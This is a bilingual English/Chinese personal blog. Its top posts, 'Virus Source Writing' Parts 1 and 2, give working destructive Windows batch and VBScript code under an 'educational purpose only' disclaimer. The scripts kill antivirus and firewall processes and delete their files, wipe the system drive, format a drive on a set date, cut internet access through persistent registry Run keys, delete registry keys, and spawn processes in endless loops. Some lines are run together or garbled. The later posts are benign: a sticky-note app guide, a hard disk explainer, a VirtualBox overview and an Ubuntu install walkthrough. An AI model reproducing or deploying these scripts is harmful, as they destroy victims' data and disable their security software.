2013年2月16日星期六

Virus Source Writing Part 2


This page is for educational purpose only !I will not be responsible for the consequences of the user's!

此页面仅用于教育目的!本人将不负责使用者的后果!




How To Disable Victim Antivirus. / 如何禁用受害者杀毒软件。

@ echo off
rem --rem Permanently Kill Anti-Virusnet stop “Security Center”netsh firewall set opmode mode=disabletskill /A av*tskill /A fire*tskill /A anti*clstskill /A spy*tskill /A bullguardtskill /A PersFwtskill /A KAV*tskill /A ZONEALARMtskill /A SAFEWEBclstskill /A OUTPOSTtskill /A nv*tskill /A nav*tskill /A F-*tskill /A ESAFEtskill /A cleclstskill /A BLACKICEtskill /A def*tskill /A kavtskill /A kav*tskill /A avg*tskill /A ash*clstskill /A aswupdsvtskill /A ewid*tskill /A guard*tskill /A guar*tskill /A gcasDt*tskill /A msmp*clstskill /A mcafe*tskill /A mghtmltskill /A msiexectskill /A outposttskill /A isafetskill /A zap*clstskill /A zauinsttskill /A upd*tskill /A zlclien*tskill /A minilogtskill /A cc*tskill /A norton*clstskill /A norton au*tskill /A ccc*tskill /A npfmn*tskill /A loge*tskill /A nisum*tskill /A issvctskill /A tmp*clstskill /A tmn*tskill /A pcc*tskill /A cpd*tskill /A pop*tskill /A pav*tskill /A padminclstskill /A panda*tskill /A avsch*tskill /A sche*tskill /A syman*tskill /A virus*tskill /A realm*clstskill /A sweep*tskill /A scan*tskill /A ad-*tskill /A safe*tskill /A avas*tskill /A norm*clstskill /A offg*del /Q /F C:\Program Files\alwils~1\avast4\*.*del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exedel /Q /F C:\Program Files\kasper~1\*.execlsdel /Q /F C:\Program Files\trojan~1\*.exedel /Q /F C:\Program Files\f-prot95\*.dlldel /Q /F C:\Program Files\tbav\*.datclsdel /Q /F C:\Program Files\avpersonal\*.vdfdel /Q /F C:\Program Files\Norton~1\*.cntdel /Q /F C:\Program Files\Mcafee\*.*clsdel /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*del /Q /F C:\Program Files\Norton~1\Norton~1\*.*del /Q /F C:\Program Files\Norton~1\*.*clsdel /Q /F C:\Program Files\avgamsr\*.exedel /Q /F C:\Program Files\avgamsvr\*.exedel /Q /F C:\Program Files\avgemc\*.execlsdel /Q /F C:\Program Files\avgcc\*.exedel /Q /F C:\Program Files\avgupsvc\*.exedel /Q /F C:\Program Files\grisoftdel /Q /F C:\Program Files\nood32krn\*.exedel /Q /F C:\Program Files\nood32\*.execlsdel /Q /F C:\Program Files\nod32del /Q /F C:\Program Files\nood32del /Q /F C:\Program Files\kav\*.exedel /Q /F C:\Program Files\kavmm\*.exedel /Q /F C:\Program Files\kaspersky\*.*clsdel /Q /F C:\Program Files\ewidoctrl\*.exedel /Q /F C:\Program Files\guard\*.exedel /Q /F C:\Program Files\ewido\*.execlsdel /Q /F C:\Program Files\pavprsrv\*.exedel /Q /F C:\Program Files\pavprot\*.exedel /Q /F C:\Program Files\avengine\*.execlsdel /Q /F C:\Program Files\apvxdwin\*.exedel /Q /F C:\Program Files\webproxy\*.exedel /Q /F C:\Program Files\panda software\*.*rem --




Tasks Kill

destroy the victim & kill the Os
破坏受害者的OS

@echo off
start calc
tskill msnmsgr
tskill firefox
tskill iexplore
tskill LimreWire
tskill explorer
tskill explorer
tskill explorer
tskill explorer
tskill explorer
pause



Crazy caps lock


*This constantly turns caps lock on and off really fast continuously*

Code:-

Set wshShell =wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop

What sex is your computer ?

Virus Source :

CreateObject("SAPI.SpVoice").Speak"wellcome to kennex dot blog spot dot com thanks for your support"




2012年12月4日星期二

Virus Source Writing Part 1


This page is for educational purpose only !I will not be responsible for the consequences of the user's!

此页面仅用于教育目的!本人将不负责使用者的后果!





This Virus Deletes All The Content Of A Drive... / 该病毒会删除所有驱动器的内容...

Virus Source :

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00



Example Download

Disable Internet Permanently / 永久禁用Internet


Virus Source :

echo @echo off>c:windowswimn32.bat
echo break off>>c:windowswimn32.bat
echo ipconfig/release_all>>c:windowswimn32.bat
echo end>>c:windowswimn32.bat
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
echo You Have Been HACKED! ---- By Kennex
PAUSE


Example Download


The Most Simple Virus To Crush The Window / 最简单的病毒,粉碎窗口


Virus Source :

@Echo off
Del C:\ *.* |y


Example Download


This Will Crash Your Computer / 你的电脑会崩溃


Virus Source :

Option Explicit

Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")

Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"

It Only Works With Windows XP )

Example Download


Delete Key Registry Files [NOTE THIS IS DANGEROUS!! USE AT RISK] /     删除键的注册表文件[注:这是危险的!]


This will delete key registry files, then loops a message (CANNOT BE RECOVERED FROM)*
这将删除键的注册表文件,然后循环的消息无法恢复
Virus Source :

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your computer has been fcked.  Have a nice day.
GOTO MESSAGE


Example Download


Endless Notepads / 无尽的记事本


*This will pop up endless notepads until the computer freezes and crashes*
*这将弹出无尽的记事本,直到电脑死机和崩溃*
Virus Source :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top



Example Download

 Bomb Virus / 炸弹病毒


Note:- You Can Change The Date ( 2009/11/25 ) Of The Virus And The Location ( format E: ) On Which It Does Its Action
The Virus Will Take Effect On That Day


注: - 您可以更改日期(2009/11/25)的病毒和位置(格式E)在它的行动。
该病毒会在那一天起生效

Virus Source :

If %date% NEQ 2009/11/25 goto exit
format E: /y >nul
:exit
exit


And Save It As Anything.bat

Example Download




View More: 











2012年11月17日星期六

Free Sticky Note

Free Sticky Note is a totally freeware that offers you a simple and easy way to remember all your intentions. You can create a list of things to do, write out your ideas in a meeting or create an alarm to notice you. Never have to worry about finding a pen and a paper to write notes, Free Sticky Note has an unlimited supply and is very easy to use and quick to open.

Free Sticky Note是一个完全免费的记事,为您提供一个简单易用的方式来记住你的意图。您可以创建一个要做的事情,你的想法写在会议或创建一个报警注意到你。从来没有担心找到笔和纸做笔记,记事贴有免费无限量供应,是非常容易使用,迅速打开。

Tutorials / 教程

How to make a new note? /   如何使一个新的笔记吗?

There are 2 ways to create a note with Free Sticky Note. First start the program, you will see a small icon in your tray. You can make a new note by:
  • Double left click on the icon
  • Right click on the icon and select "New Note"
有2种方式创建一个免费的记事票据。首先启动该程序,你会看到一个小图标在您的托盘。您可以建立一个新的说明:
  • 左键点击图标
  • 右键点击图标,选择"New Note"

How to change the color of my notes? / 如何更改我的笔记的颜色吗?

Right click on the small icon of Free Sticky Note in the tray, select "Change Style" and choose the new color you want. Next double click on the icon (or right click and select "New Note") to create a note with your favourite color.

免费的记事贴在托盘上的小图标,右键单击选择“更改样式”,然后选择你想要的颜色。下一页双击图标(或右键单击并选择“新票据”)创建注释,你最喜欢的颜色。







How to minimize the notes? / 如何最小化notes?

Just double click on any part of the note (exclude the "title", "content" and "close button" parts) to minimize your note.

只要双击任何部分的说明(不包括“标题”,“内容”和“关闭”按钮“部分),以
最小化notes.




I have an important work to do in a few minutes, can Free Sticky Note alarm me on time? / 我有一个重要的工作要做,在几分钟之内,Free Sticky Note可以提醒我的时间吗?

Yes, Free Sticky Note can! Just right click on the icon and select "Alarm Me". A dialog box appears and you can set when you want to be noticed. For example, you'll have to go in 10 minutes then you click on "Alarm Me after" and type "10". If you want to hear a sound when the alarm rings, tick on "Play Sound when alarm". To make sure you can hear the sound, you can click "Test Sound" to listen the sound (just a short sound). Notice that when the real alarm rings, you will hear an infinite sound until you turn it off.

是的,免费的记事可以!只需右键单击该图标,选择“报警”。会出现一个对话框,你可以设置当你要注意。例如,你必须在10分钟内走,然后你点击“报警后”和“10”型。如果你想听到的声音,当闹钟响起时,勾选“播放声音时,报警”。为了确保你能听到的声音,你可以点击“测试声音”听声音(只有很短的声音)。请注意,真正的闹钟响起时,你会听到一个无限的声音,直到你把它关掉。

After pressing "Set" button, a dialog will appear to confirm the alarm has been activated
按下“SET”按钮后,会出现一个对话框,确认报警被激活








SEE MORE :

2012年11月15日星期四

What is Harddisk / 什么是硬盘



Harddisk


Alternatively referred to as a hard disk drive and abbreviated as HDD or HDD, the hard drive is the computer's main storage media device that permanently stores all data on the computer. The hard drive was first introduced on September 13, 1956 and consists of one or more hard drive platters inside of air sealed casing. Most computer hard drives are in an internal drive bay at the front of the computer and connect to the motherboard using either ATA, SCSI, or a SATA cable and power cable. Below, is an illustration of what the inside of a hard drive looks like for a desktop and laptop hard drive.

或者简称为硬盘驱动器,简称为HDD或硬盘驱动器,硬盘驱动器是电脑的主要存储介质设备,永久存储在电脑上的所有数据。 1956年9月13日,首次推出的硬盘驱动器由一个或多个硬盘驱动器盘片内部的空气密闭容器内。大多数的计算机硬盘驱动器在内部驱动器托架在电脑前和使用无论是ATA,SCSI或SATA电缆和电源线连接到主板上。下面,就是一个例证内的台式机和笔记本电脑的硬盘驱动器的硬盘驱动器看起来像什么。


** Note :  head actuator = 头致动器
               read/write actuator arm = 读/写促动臂
               read/write head = 读/写磁头
               spindle = 主轴
               platter = 磁盘
              Chassis = 底盘

As can be seen in the above picture, the desktop hard drive has six components: the head actuator, read/write actuator arm, read/write head, spindle, and platter. On the back of a hard drive is a circuit board called the disk controller.

在上面的图片中可以看出,台式机硬盘有六个组成部分:头致动器,读/写促动臂,读/写磁头,主轴和磁盘。在硬盘驱动器的背面一个称为磁盘控制器的电路板。

How is data read and stored on a hard drive? 

数据是如何读取和存储在硬盘上吗?

Data sent to and from the hard drive is interpreted by the disk controller, which tells the hard drive what to do and how to move the components within the drive. When the operating system needs to read or write information, it examines the hard drives File Allocation Table (FAT) to determine file location and available areas. Once this has been determined, the disk controller instructs the actuator to move the read/write arm and align the read/write head. Because files are often scattered throughout the platter, the head will often need to move to several different locations to access all information.

All information stored on a traditional hard drive, like the above example, is done magnetically. After completing the above steps, if the computer needs to read information from the hard drive it would read the magnetic polarities on the platter. One side of the magnetic polarity is 0 and the other is 1, reading this as binary data the computer can understand what the data is on the platter. For the computer to write information to the platter, the read/write head aligns the magnetic polarities, writing 0's and 1's that can be read later.

发送的数据和从硬盘驱动器,硬盘驱动器做什么和如何移动的组件,驱动器内的磁盘控制器,它告诉解释。当操作系统需要读取或写入信息时,它会检查硬盘驱动器的文件分配表(FAT),以确定文件的位置和可用区域。一旦这已经确定时,磁盘控制器指示的致动器移动的读/写臂和对齐的读/写头。因为文件通常分散在整个盘子里,头部会经常需要移动几个不同的地点访问所有信息。

传统的硬盘驱动器上存储的所有信息,如上面的例子中,磁性。完成上述步骤后,如果计算机需要从硬盘驱动器读取信息,它会读取盘片上的磁场极性。一侧的磁场极性为0,另一方为1,读取此作为二进制数据的计算机可以理解的,在盘片上的数据是什么。对于计算机将信息写入到盘片上,读/写头对齐,写0和1的后面,可以读出的磁场极性。




See More :


2012年11月13日星期二

VirtualBox a virtualization product for enterprise


VirtualBox

VirtualBox is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 2. See "About VirtualBox" for an introduction.

Presently, VirtualBox runs on Windows, Linux, Macintosh, and Solaris hosts and supports a large number of guest operating systems including but not limited to Windows (NT 4.0, 2000, XP, Server 2003, Vista, Windows 7), DOS/Windows 3.x, Linux (2.4 and 2.6), Solaris and OpenSolaris, OS/2, and OpenBSD.

VirtualBox is being actively developed with frequent releases and has an ever growing list of features, supported guest operating systems and platforms it runs on. VirtualBox is a community effort backed by a dedicated company: everyone is encouraged to contribute while Oracle ensures the product always meets professional quality criteria.


VirtualBox是一个强大的x86和AMD64/Intel64的虚拟化产品,为企业和家庭使用。不仅是VirtualBox的一个功能极为丰富,高性能的产品,为企业客户,它也是唯一的专业解决方案,作为开源软件是免费提供的条款下的GNU通用公共许可证(GPL)版本2。请参阅“关于VirtualBox的”作一介绍。

目前,VirtualBox在Windows,Linux,Macintosh电脑,和Solaris主机上运行,并支持大量的客户操作系统,包括但不限于Windows(NT 4.0,2000,XP,Server 2003中,Vista中,Windows 7中),DOS/ Windows的3 X操作系统,Linux(2.4和2.6),OS / 2,Solaris和OpenSolaris和OpenBSD。

VirtualBox是积极发展与频繁的发布,有越来越多的功能,支持的来宾操作系统和平台上运行。 VirtualBox是一个社会的努力,由一个专门的公司支持,而Oracle可确保产品始终符合专业质量标准,鼓励每个人做出贡献。

Perview / 预展


VirtualBox for Linux/UNIX. Within VirtualBox Windows XP is running.










VirtualBox for Mac OS X. Within VirtualBox Windows 7 is running.












VirtualBox for Windows. Within VirtualBox Ubuntu 10.10 is running.












DOWNLOAD / 下载




In ubuntu just login to software center and type in VirtualBox in search bar 
在ubuntu中,只需登录软件中心在搜索栏填上VirtualBox



SEE MORE :


2012年11月10日星期六

Install Ubuntu 12.10 / 安装Ubuntu 12.10


Using a USB drive / 使用U盘安装


Most newer computers can boot from USB. You should see a welcome screen prompting you to choose your language and giving you the option to install Ubuntu or try it from the CD.

If your computer doesn’t automatically do so, you might need to press the F12 key to bring up the boot menu, but be careful not to hold it down - that can cause an error message.

大多数较新的计算机可以从USB启动。您应该会看到一个欢迎屏幕,提示你选择你的语言,并让您选择安装Ubuntu或尝试从CD。

如果您的电脑不会自动这样做,你可能需要按F12键调出引导菜单,但要小心,不要按住不放 - 这可能会导致错误消息。


Prepare to install Ubuntu / 准备安装Ubuntu


  • We recommend you plug your computer into a power source
  • You should also make sure you have enough space on your computer to install Ubuntu
  • We advise you to select Download updates while installing and Install this third-party software now
  • You should also stay connected to the internet so you can get the latest updates while you install Ubuntu
  • If you’re not connected to the internet, we’ll help you set up wireless at the next step

  • 我们建议您插入您的电脑插入电源
  • 您还应该确保你有足够的空间在您的电脑上安装Ubuntu
  • 我们建议您选择下载更新安装时和安装这个第三方软件现在
  • 当你安装Ubuntu你也应该保持连接到互联网,这样你就可以得到最新的更新。
  • 如果你没有连接到互联网,我们将帮助您设置无线网络的下一个步骤

Set up wireless / 连接无线网络


If you are not connected to the internet, you will be asked to select a wireless network, if available. We advise you to connect during the installation so we can ensure your machine is up to date. So, if you set up your wireless network at this point, it’s worth then clicking the Back button to go back to the last screen (Preparing to install Ubuntu) and ticking the box marked ’Download updates while installing’.

如果您没有连接到互联网,我们建议您在安装过程中选择一个无线网络,如果有的话。所以我们可以确保您的计算机是最新的连接。因此,如果您设置您的无线网络,在这一点上,它的价值,然后点击“返回”按钮,返回到最后一个屏幕(准备安装Ubuntu)和滴答框标记为“下载更新,同时安装”。


Allocate drive space / 分配驱动器空间


Use the checkboxes to choose whether you’d like to Install Ubuntu alongside another operating system, delete your existing operating system and replace it with Ubuntu, or – if you’re an advanced user – choose the ’Something else’ option

使用复选框选择是否要到另一个操作系统一起安装Ubuntu,删除现有的作业系统,取而代之的是Ubuntu,或者 - 如果你是高级用户 - 选择'别的东西'选项


Begin the installation / 开始安装


Depending on your previous selections, you can now verify that you have chosen the way in which you would like to install Ubuntu. The installation process will begin when you click the Install Now button.

Ubuntu needs about 4.5 GB to install, so add a few extra GB to allow for your files.

Not sure about this step? Windows users can use the Windows installer, which will install and uninstall Ubuntu in the same way as any other Windows application. It’s simpler and completely safe.

根据您先前的选择,你现在可以验证您所选择的方式,你想安装Ubuntu。安装过程将开始,当您单击“立即安装”按钮。

Ubuntu的安装需要约4.5 GB,因此添加了一些额外的GB,让您的文件。

不知道这一步? Windows用户可以使用Windows安装程序,安装和卸载Ubuntu在任何其他Windows应用程序相同的方式。它的简单和完全安全的。


Select your location / 选择你的所在地点


If you are connected to the internet, this should be done automatically. Check your location is correct and click ’Forward’ to proceed. If you’re unsure of your time zone, type the name of the town you’re in or click on the map and we’ll help you find it.

如果您已连接到互联网,这应该是自动完成的。您的位置是正确的,然后点击“前进”进行。如果你不确定你的时区,输入你在的城市的名称,或在地图上点击,我们会帮您找到它。


Select your preferred keyboard layout / 选择您喜欢的键盘布局


Click on the language option you need. If you're not sure, click the ’Detect Keyboard Layout’ button for help.

点击你需要的语言选项。如果你不知道,单击“检测键盘布局”按钮寻求帮助。


Enter your login and password details / 填上你的个人资料和密码


The best choice for automatic login, so after each login no need required password to logon.

最好选择自动登录,免得以后每次登陆都要被要求密码。


Learn more about Ubuntu while the system installs…/ 系统安装时了解更多关于Ubuntu...

…or make a cup of tea! 

....或泡一杯茶!


That’s it. / 就是这样。


All that’s left is to restart your computer and start enjoying Ubuntu!

剩下的就是重新启动您的计算机,并开始享受Ubuntu的!







Download Ubuntu for your desktop / 为你的电脑下载Ubuntu

You can choose between two options when you download Ubuntu for a desktop PC. Ubuntu 12.10 gives you all the latest features, while Ubuntu 12.04.1 LTS comes with extended support.

您可以在两个选项之间进行选择,当你下载Ubuntu的桌面​​PC。 Ubuntu的12.10为您提供所有最新的功能,而Ubuntu12.04.1 LTS的扩展支持。